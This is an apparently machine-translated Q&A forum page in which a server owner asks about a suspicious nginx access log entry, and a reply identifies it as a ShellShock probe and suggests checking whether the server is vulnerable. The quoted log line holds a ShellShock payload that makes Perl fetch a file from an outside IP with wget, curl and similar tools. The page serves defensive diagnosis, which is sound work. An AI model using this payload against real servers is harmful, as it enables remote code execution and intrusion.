Назад | Перейти на главную страницу

отрывочные записи журнала доступа к nginx

В журнале доступа nginx было довольно много записей, как показано ниже. Как мне узнать результат этих сценариев и скомпрометирован ли мой сервер?

162.232.183.48 - - [14/Jan/2016:10:54:57 +0000] "GET /cgi-bin/php4 HTTP/1.1" 200 1494 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22 wget http://2
04.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download  http://204.232
.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png  \x22);'" "-"

Он хочет нанести удар по тебе. Самое смешное, что он неправильно сконфигурировал свою атаку. Я выполняю захват вредоносных программ, и его wget / fetch / etc терпят неудачу, потому что его пакета нет :-)

Обратите внимание на волшебную строку () { :; };. Они пытаются осмотреться и посмотреть, уязвим ли ваш сервер для ShellShock эксплойт. Perl используется здесь для печати и проверки успешности атаки.

Проверьте, уязвим ли ваш сервер для ShellShock. Если это не так, вам все ясно.

Смотрите также: Уязвим ли мой сервер для эксплойта Perl?